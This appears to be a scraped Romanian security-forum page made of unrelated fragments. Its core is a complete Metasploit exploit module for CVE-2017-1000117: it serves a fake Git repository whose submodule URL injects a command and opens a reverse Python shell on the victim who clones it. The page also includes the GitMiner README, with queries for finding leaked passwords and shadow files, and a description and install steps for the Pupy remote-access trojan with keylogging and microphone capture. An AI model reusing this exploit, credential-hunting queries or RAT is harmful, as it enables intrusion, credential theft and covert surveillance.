Leaderboard

Dicţionarul a fost creat în perioada 2013-2016. Download: https://mega.nz/#!HEQAnIYA!k-igkydxW_zeKMvAVLZEWOEVQM5JcXUVb0dmiOvxL3w

Prezentat la Blackhat Asia 2016 more info - Instrumentation Techniques and ROP Exploit Rapid Analysis PDF: http://blackhat.com/docs/asia-16/materials/arsenal/asia-16-Li-StackPivotChecker.pdf download: http://blackhat.com/docs/asia-16/materials/arsenal/asia-16-Li-StackPivotChecker-tool.zip

Succes cu alta placa de baza. Suruburile au fost introduse incorect.

https://www.usenix.org/system/files/conference/usenixsecurity15/sec15-paper-caliskan-islam.pdf

http://scaneye.net/ In trecut era si serviciul asta, care nu stiu daca mai functioneaza.

Cerut, livrat, platit in mai putin de 5 minute. Recomand

Bai, a fost simplu dar sunt eu prost. Ma complicam la inceput sa inserez un alt query in parametrul par, dar nu avea rost pentru ca ghilimele. Ai pm, mersi de challenge.

EDB-ID: 42599 Author: Metasploit Published: 2017-08-31 CVE: CVE-2017-1000117 Type: Remote Platform: Python Aliases: N/A Advisory/Source: Link Tags: Metasploit Framework E-DB Verified: Exploit: Download / View Raw Vulnerable App: N/A ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => 'Malicious Git HTTP Server For CVE-2017-1000117', 'Description' => %q( This module exploits CVE-2017-1000117, which affects Git version 2.7.5 and lower. A submodule of the form 'ssh://' can be passed parameters from the username incorrectly. This can be used to inject commands to the operating system when the submodule is cloned. This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised. ), 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2017-1000117'], ['URL', 'http://seclists.org/oss-sec/2017/q3/280' ] ], 'DisclosureDate' => 'Aug 10 2017', 'Targets' => [ [ 'Automatic', { 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Payload' => { 'Compat' => { 'PayloadType' => 'python' } } } ] ], 'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse_python' }, 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('GIT_URI', [false, 'The URI to use as the malicious Git instance (empty for random)', '']), OptString.new('GIT_SUBMODULE', [false, 'The path to use as the malicious git submodule (empty for random)', '']) ] ) end def setup @repo_data = { git: { files: {} } } setup_git super end def setup_git # URI must start with a / unless git_uri && git_uri =~ /^\// fail_with(Failure::BadConfig, 'GIT_URI must start with a /') end payload_cmd = payload.encoded + " &" payload_cmd = Rex::Text.to_hex(payload_cmd, '%') submodule_path = datastore['GIT_SUBMODULE'] if submodule_path.blank? submodule_path = Rex::Text.rand_text_alpha(rand(8) + 2).downcase end gitmodules = "[submodule \"#{submodule_path}\"] path = #{submodule_path} url = ssh://-oProxyCommand=#{payload_cmd}/ " sha1, content = build_object('blob', gitmodules) @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content tree = "100644 .gitmodules\0#{[sha1].pack('H*')}" tree += "160000 #{submodule_path}\0#{[sha1].pack('H*')}" sha1, content = build_object('tree', tree) @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content ## build the supposed commit that dropped this file, which has a random user/company email = Rex::Text.rand_mail_address first, last, company = email.scan(/([^\.]+)\.([^\.]+)@(.*)$/).flatten full_name = "#{first.capitalize} #{last.capitalize}" tstamp = Time.now.to_i author_time = rand(tstamp) commit_time = rand(author_time) tz_off = rand(10) commit = "author #{full_name} <#{email}> #{author_time} -0#{tz_off}00\n" \ "committer #{full_name} <#{email}> #{commit_time} -0#{tz_off}00\n" \ "\n" \ "Initial commit to open git repository for #{company}!\n" sha1, content = build_object('commit', "tree #{sha1}\n#{commit}") @repo_data[:git][:files]["/objects/#{get_path(sha1)}"] = content @repo_data[:git][:files]['/HEAD'] = "ref: refs/heads/master\n" @repo_data[:git][:files]['/info/refs'] = "#{sha1}\trefs/heads/master\n" end # Build's a Git object def build_object(type, content) # taken from http://schacon.github.io/gitbook/7_how_git_stores_objects.html header = "#{type} #{content.size}\0" store = header + content [Digest::SHA1.hexdigest(store), Zlib::Deflate.deflate(store)] end # Returns the Git object path name that a file with the provided SHA1 will reside in def get_path(sha1) sha1[0...2] + '/' + sha1[2..40] end def exploit super end def primer # add the git and mercurial URIs as necessary hardcoded_uripath(git_uri) print_status("Malicious Git URI is #{URI.parse(get_uri).merge(git_uri)}") end # handles routing any request to the mock git, mercurial or simple HTML as necessary def on_request_uri(cli, req) # if the URI is one of our repositories and the user-agent is that of git/mercurial # send back the appropriate data, otherwise just show the HTML version user_agent = req.headers['User-Agent'] if user_agent && user_agent =~ /^git\// && req.uri.start_with?(git_uri) do_git(cli, req) return end do_html(cli, req) end # simulates a Git HTTP server def do_git(cli, req) # determine if the requested file is something we know how to serve from our # fake repository and send it if so req_file = URI.parse(req.uri).path.gsub(/^#{git_uri}/, '') if @repo_data[:git][:files].key?(req_file) vprint_status("Sending Git #{req_file}") send_response(cli, @repo_data[:git][:files][req_file]) else vprint_status("Git #{req_file} doesn't exist") send_not_found(cli) end end # simulates an HTTP server with simple HTML content that lists the fake # repositories available for cloning def do_html(cli, _req) resp = create_response resp.body = <<HTML <html> <head><title>Public Repositories</title></head> <body> <p>Here are our public repositories:</p> <ul> HTML this_git_uri = URI.parse(get_uri).merge(git_uri) resp.body << "<li><a href=#{git_uri}>Git</a> (clone with `git clone #{this_git_uri}`)</li>" resp.body << <<HTML </ul> </body> </html> HTML cli.send_response(resp) end # Returns the value of GIT_URI if not blank, otherwise returns a random .git URI def git_uri return @git_uri if @git_uri if datastore['GIT_URI'].blank? @git_uri = '/' + Rex::Text.rand_text_alpha(rand(10) + 2).downcase + '.git' else @git_uri = datastore['GIT_URI'] end end end Source: https://www.exploit-db.com/exploits/42599/

+ Autor: Danilo Vaz a.k.a. UNK + Blog: http://unk-br.blogspot.com + Github: http://github.com/danilovazb + Twitter: https://twitter.com/danilovaz_unk WARNING +---------------------------------------------------+ | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT | | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY | | THIS PROGRAM | +---------------------------------------------------+ Description Advanced search tool and automation in Github. This tool aims to facilitate research by code or code snippets on github through the site's search page. Motivation Demonstrates the fragility of trust in public repositories to store codes with sensitive information. Requirements lxml requests Install: git clone http://github.com/danilovazb/GitMiner sudo apt-get install python-requests python-lxml OR pip install -r requirements.txt Help: usage: ██████╗ ██╗████████╗███╗ ███╗██╗███╗ ██╗███████╗██████╗ ██╔════╝ ██║╚══██╔══╝████╗ ████║██║████╗ ██║██╔════╝██╔══██╗ ██║ ███╗██║ ██║ ██╔████╔██║██║██╔██╗ ██║█████╗ ██████╔╝ ██║ ██║██║ ██║ ██║╚██╔╝██║██║██║╚██╗██║██╔══╝ ██╔══██╗ ╚██████╔╝██║ ██║ ██║ ╚═╝ ██║██║██║ ╚████║███████╗██║ ██║ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝╚═╝ ╚═╝ v1.1 Automatic search for GitHub. + Autor: Danilo Vaz a.k.a. UNK + Blog: http://unk-br.blogspot.com + Github: http://github.com/danilovazb + Gr33tz: l33t0s, RTFM +[WARNING]------------------------------------------+ | THIS TOOL IS THE PENALTY FOR EDUCATIONAL USE, | | THE AUTHOR IS NOT RESPONSIBLE FOR ANY DAMAGE TO | | THE TOOL THAT USE. | +---------------------------------------------------+ [-h] [-q 'filename:shadown path:etc'] [-m wordpress] [-o result.txt] optional arguments: -h, --help show this help message and exit -q 'filename:shadown path:etc', --query 'filename:shadown path:etc' Specify search term -m wordpress, --module wordpress Specify the search module -o result.txt, --output result.txt Specify the output file where it will be saved Example: Searching for wordpress configuration files with passwords: $:> python git_miner.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -o result.txt Looking for brasilian government files containing passwords: $:> python git_miner.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas Looking for shadow files on the etc paste: $:> python git_miner.py --query 'filename:shadow path:etc' -m root Searching for joomla configuration files with passwords: $:> python git_miner.py --query 'filename:configuration extension:php "public password" in:file' -m joomla Hacking SSH Servers: Download: GitMiner-master.zip Source: https://github.com/UnkL4b/GitMiner

Material Introduction Section 1) Fundamentals Section 2) Malware Techniques Section 3) RE Tools Section 4) Triage Analysis Section 5) Static Analysis Section 6) Dynamic Analysis Sursa: https://securedorg.github.io/RE101/

Pupy Pupy este un OpenSource , multi-platforma(WIN,Linux,OSX,Android).Este un RAT(instrument de administrare de la distanta) si un instrument de post-exploatare.In principal este scris in Python. Modulele Pupy pot accesa în mod transparent obiecte Python de la distan?ă folosind rpyc pentru a efectua diverse activită?i interactive. Pupy poate genera sarcini utile în mai multe formate, cum ar fi executabilele PE, DLL-uri, fi?iere Python pure, PowerShell, apk, ... -Alege un lansator (connect,bind...), un transport(ssl,http,rsa,obfs3,scramblesuit,...) si un numar de "scriptlets".Scriptlets sun scripturi menite sa fie incorporate pentru a efectua sarcini diverse off-line(fara a necesista o sesiune), cum ar fi adaugarea de persistenta, de a porni un keylogger, detectarea de sandbox. Caracteristici -Pe ferestre, Pupy este compilat ca un DLL si este incarcat in memorie. -Poate migra reflexiv in alte procese. -Poate importa la distanta, din memorie, pachete python pure(PY,.PYC), Pyhton C(.pyd). -Pupy este usor extensibil, foloseste[rpyc]. -Pupy poate comunica folosind si obfsproxy.Toate modulele non interactive pot fi expediate la gazde multiple intr-o singura comanda. -Multi-platforma(testat pe win 7,8,10,kali linux,ubuntu,OSX,Android) -In mai multe formate exe(x86, x64), dll (x86, x64), Python, apk, ... Transport -rsa -Un strat cu autentificare sicriptare folosind RSA si AES256, de multe ori cu alte straturi suprapuse. -Strat folosind o cheie AES256 statica -Ssl(defaut) -http - obfs3 -cu ajutorul stratului rsa pentru o securitate mai buna. -etc. Windows Specific -migreaza -functioneaza foarte bine cu [mimitakz] -screenshot -inregistrare microfon -keylogger -inregistrare tastatura -capturi de ecran la fiecare click -etc Screenshots https://github.com/n1nj4sec/pupy/wiki/Screenshots Install git clone https://github.com/n1nj4sec/pupy.git pupy cd pupy git submodule update --init --depth 1 pupy/payload_templates git submodule init git submodule update pip install -r requirements.txt